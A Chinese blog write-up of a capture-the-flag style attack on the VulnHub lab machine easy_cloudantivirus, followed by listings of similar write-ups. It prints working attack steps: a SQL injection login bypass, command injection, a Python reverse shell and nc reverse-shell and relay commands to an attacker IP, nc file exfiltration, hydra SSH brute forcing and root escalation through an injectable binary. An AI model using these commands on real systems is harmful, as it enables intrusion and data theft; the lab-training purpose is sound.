打靶第二周-easy_cloudantivirus

最新推荐文章于 2024-09-18 22:48:53 发布
最新推荐文章于 2024-09-18 22:48:53 发布
阅读量1.9k 收藏 3
点赞数 3
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wcwdnmdnmd/article/details/120252250
版权

easy_cloudantivirus

靶机地址

easy_cloudantivirus

攻击手段

  • 端口扫描
  • WEB侦查
  • SQL注入
  • 命令注入
  • 密码爆破
  • 代码审计
  • NC串联
  • 本地提权

所用工具

arping
nmap
hydra
nc
burp
sqlite

开始攻击

主机发现

使用arping来发现
因为arping一次只能扫一个可使用for i in $(seq 1 254);do arping -c 2 192.168.168.$i;done来扫描网段
在这里插入图片描述

也可使用nmap 192.168.168.0/24发现主机

在这里插入图片描述
可看到目标主机开了22和8080端口,扫描具体的端口和服务nmap -p22,8080 -sV 192.168.168.14
在这里插入图片描述

访问8080
在这里插入图片描述
发现是一个云病毒扫描
需要使用邀请码登录。
这样就有两种方法

  1. 暴力破解
  2. sql注入

sql注入

抓包后,可以尝试所有的特殊符号33个。发现"报错查看页面后
在这里插入图片描述
看到sql语句
select * from code where password="' + password + '"
这样就可以闭合sql语句
使用or 1=1使条件永为真
即输入"or 1=1--+
在这里插入图片描述
成功进入
当输入hello中时
在这里插入图片描述

命令执行

由上面得,我们猜测在后端执行的命令得逻辑为
avscan hello |ls
这样输入hello |ls得到
在这里插入图片描述
成功!

反弹shell

因为本机有python2环境,可使用上次使用的反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.168.13",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

但这次尝试nc反弹shell

查看是否有nc

hello |which nc
在这里插入图片描述
返回了路径,证明有nc

开启侦听nc反弹

kali端执行nc -nlvp 4444命令
浏览器执行hello |nc 192.168.168.13 4444 -e /bin/sh失败了
可能是因为此nc版本不支持-e参数
删除-e,可收到链接。
hello |nc 192.168.168.13 4444
在这里插入图片描述

nc串联

先在kali开启两个监听,分别监听3333和4444端口
在浏览器执行命令hello |nc 192.168.168.13 3333 |/bin/bash |nc 192.168.168.13 4444
两个nc都收到了返回,在3333端口执行命令,会在4444端口看到返回!
在这里插入图片描述
分析hello |nc 192.168.168.13 3333 |/bin/bash |nc 192.168.168.13 4444
执行后会先在3333端口建立链接,这时在3333输入任何命令都会调用/bin/bash,执行之后从4444端口输出

查看文件

有app.py和datebase.aql
file database.sql

尝试sqlite失败,这样可以下载下来查看

下载文件

开启nc侦听5555端口并将得到的数据存入db.sql。
nc -nlvp 5555 > db.sql
之后在3333端口执行nc 192.168.168.13 5555 < database.sql
在这里插入图片描述
并使用sqlite打开
在这里插入图片描述
可看到插入数据。

查看目标中有哪些用户

在3333端口执行cat /etc/passwd
在这里插入图片描述
使用cat /etc/passwd | grep /bin/bash筛选出具有shell执行权限的用户
在这里插入图片描述
有三个:root,cloudav,scanner

制作字典

创建vi user.txt
在这里插入图片描述
创建vi pass.txt
在这里插入图片描述

ssh爆破

命令hydra -L user.txt -P pass.txt ssh://192.168.168.14

在这里插入图片描述
可惜失败了!

查看其他文件

在上一级目录中发现了相同名称的文件
在这里插入图片描述
ls -l后发现updata_cloudav文件得所有者是root
在这里插入图片描述
这样若我们能进行命令注入将得到root权限
查看源文件cat update_cloudav.c
在这里插入图片描述
可看到在执行该文件时需在后面加命令
猜测
看到调用了log
猜测也可调用nc

提权

再次使用./update_cloudav "a|nc 192.168.168.13 5555 | /bin/bash |nc 192.168.168.13 6666"并监听5555和6666。
在这里插入图片描述
这样就得到了root权限!!

补充:暴力破解邀请码

kali自带字典位置/usr/share/wordlists
选中字典后使用burp suit进行爆破。

总结

本次实验包含

  • 主机发现
  • 端口扫描/服务发现
  • sql注入/爆破
  • 命令执行
  • ssh爆破
  • suid提权

勇于尝试,遇到失败转换思路,不要气馁。

靶机无法获得IP地址, 该怎么办?
墨痕诉清风的博客
07-18 1830
靶机的作者通常更建议我们使用VirtualBox来运行靶机,而不是VMWare家的虚拟化产品。如果靶机启动后无法获得IP地址(扫描无法发现靶机IP),请首先使用虚拟机的重启功能(Host+R)重新启动靶机,并在重启的黑屏阶段。在学习过程中,也有部分同学遇到了一个有些共性的问题,那就是靶机启动后无法自动获得IP地址。点击键盘中字母“e”,找到内核加载的配置行,如下图所示,将其修改为单用户启动模式。将配置文件中的网卡名称修改为当前的正确名称,并确定DHCP配置启动。保存配置修改,重启计算机正常进入系统!...
VulnHub靶机-easy_cloudantivirus 打靶
网络空间安全学习
04-12 1051
加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果。此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式。抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试。发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行。
0x02-easy_cloudantivirus
rec09er的博客
04-12 1183
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova 通关目标:取得目标靶机的root权限 攻击机:kali(10.0.2.10) 目标靶机:easy_cloudantivirus(10.0.2.13) 涉及攻击方法:  ● 主机发现  ● 端口扫描  ● 目录扫描  ● SQL注入
vulnhub-easy_cloudantivirus
qq_41810304的博客
06-01 701
前言: 做这个靶机隔了很长时间,因为在搞毕业设计以及找工作,现在只能说论文告一段落,只剩答辩和ppt了,就接着把这个做完,下载地址也不想找了,总体而言该靶机比较简单。最后,求答辩老师放过我吧。 Kali:192.168.1.4 目标机:192.168.1.31 信息收集: 漏洞挖掘: 从信息来看,开放ssh和网站端口,并且该网站是Python写的。可以爆破22端口,一般来说还是从网站下手,在我看来爆破密码依然是最后手段。先访问8080端口。 一般这个界面没有思路的话就是看看页面源码有没
Vulnhub-easy_cloudantivirus
weixin_46107179的博客
04-01 2925
靶机下载地址:靶机下载 主机发现 通过搭建的靶机环境,可以直接通过arp-scan -l 或者arping来发现主机,得到IP地址后进行信息搜集 信息搜集 通过nmap扫描得到靶机开放了22、8080端口,并且web服务是Werkzeug httpd 0.14.1 (Python 2.7.15rc1) 既然是web服务,通过浏览器打开看到说需要邀请码,可能是需要什么密码什么的 渗透攻击 这里可以有两种攻击手段,一种是SQL注入,可以使用" or 1=1 --+绕过,另外一种是暴力破解,我这里使用bur
easys_cloudantivirus
m0_72733529的博客
07-14 854
靶机地址:BoredHackerBlog: Cloud AV ~ VulnHub靶 机 ip:192.168.0.156ka li ip:192.168.0.102内容简介:这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:端口扫描WEB侦查SQL注入命令注入密码爆破代码审计NC串联本地提权 nmap -p- 192.168.0.156 全端口扫描 nmap -p
[vulnerhub] easy_cloudav write up
CN_DS的博客
08-14 642
摘要 0x1 靶机:192.168.88.13(靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova) 攻击机:192.168.88.8 每周六都会跟着苑老师学习一片打靶课程, 然后做一篇writeup。废话不多说,开干!! 我的靶机安装在virtualbox上,攻击机使用的是kali,安装在vwmare上。使用的是桥接。链接到手动创建的...
熊猫云计算杀毒软件-CloudAntivirus
12-30
一款超好的免费杀毒软件,是最新的云计算的应用。客户端无需耗费多少内存和CPU,服务器承担计算过程。
最新EXCEL宏病毒 杀毒软件
12-19
2. **VBA宏**:VBA宏是Microsoft Office套件中的一种编程接口,允许用户编写自定义功能来自动化任务。宏病毒就是利用了VBA宏的这一特性,编写恶意代码,然后隐藏在合法的文档中。 3. **Startup(潘1006.xls)**:这...
2、easy_cloudantivirus
DamnVanish的博客
07-13 735
需要再kali上面开启3333和4444的监听,会建立两个连接一个用来执行命令一个用来回显命令,可以看到命令的中间有一个bash其实就是3333建立的连接然后在上面执行命令传给bash去执行然后再将结果发给4444的这个连接回显会来。下载好靶机后直接启动了,我发现这个靶机如果一开始选择我的无线网卡会启动不了,需要先选择一个没有的网卡启动然后关闭后再选择正确的网卡启动就可以了。又出现了这种情况,就是明明连接上了但是没有回显的情况,看了视频原来是并没有建立一个shell的反弹只是建立了一个连接。
easy_cloudantivirus靶机打靶过程及思路
qq_52610024的博客
04-04 2226
5.侦听4444端口通过连接获得shellnc10.0.2.44444-e/bin/bash-e的参数的作用是执行成功之后运行shell,发现。./update_cloudav“a|nc10.0.2.45555|/bin/bash|nc10.0.2.46666”进行suid。6.nc10.0.2.43333|/bin/bash|nc10.0.2.44444nc串联攻击。2.发现留言板后,两个思路,第一个思路是进行暴力破解,第二个思路是通过。...
easy_cloudantivirus
最新发布
guowu666的博客
09-18 904
必须安装在virtualbox攻击机:kali靶机 easy_cloudantivirus
打靶记录2——靶机easy_cloudantivirus
Fab1an的博客
07-18 777
针对靶机,首先做了主机发现,当发现了它的目标IP地址之后对它进行端口扫描和服务版本的发现,进而发现了一个HTTP的服务,工作在目标靶机的8080端口上于是我们通过浏览器访问目标靶机8080端口上的Web服务于是在这个Web页面上,我们发现了一个SQL注入漏洞,也可以使用暴力破解的方式去破解它的邀请码,进而去登录到Web应用的后台页面在后台发现命令注入漏洞,利用命令注入漏洞获得反弹的Shell然后在目标靶机上进行信息收集。
打靶笔记--easys_cloudantivirus
2301_77315080的博客
04-22 736
打靶笔记--easys_cloudantivirus
(一)easy_cloudantivirus靶机渗透练习
qq_69746732的博客
01-04 1450
easy_cloudantivirus靶机渗透练习
kali之vulhub,easycloudantivirus
weixin_54431413的博客
05-07 510
一、靶机描述 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录网址 六、利用远程命令执行漏洞与kali建立连接 七、提权 八、利用suid提取
VulnHub打靶记录——easy_cloudantivirus
未完成的歌~的博客
06-29 824
靶机下载地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/将靶机设置为NAT模式并启动。
EagleClouds专业网站建设和软件开发服务
nextworld8的博客
10-01 2597
EagleClouds专业网站建设和软件开发服务
计算机安全的特征是什么,计算机中病毒的特征是什么?
weixin_35592186的博客
07-20 418
有时我怀疑我的计算机中装有病毒,但是我不知道该怎么办?以下是学习编辑器对计算机中病毒特征的详细介绍!希望对您有帮助!计算机1中的病毒功能简介僵尸病毒: 可能是计算机运行速度较慢且计算机卡住了木马病毒: 它可以窃取用户的隐私和有价值的信息宏病毒: 通常存在于办公软件中,对系统极具破坏力只有几个简单的句子,就有很多类型的病毒,我建议主机使用安全软件来保护计算机的安全.建议您下载并安装腾讯计算机管理器并...
【网络安全】破解邀请码实现未经授权的访问和账户接管
等风来
07-29 2716
ExampleSpark(化名)是一个专为团队管理和项目协作而设计的强大平台。它提供了用于管理用户、项目和权限的综合工具。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值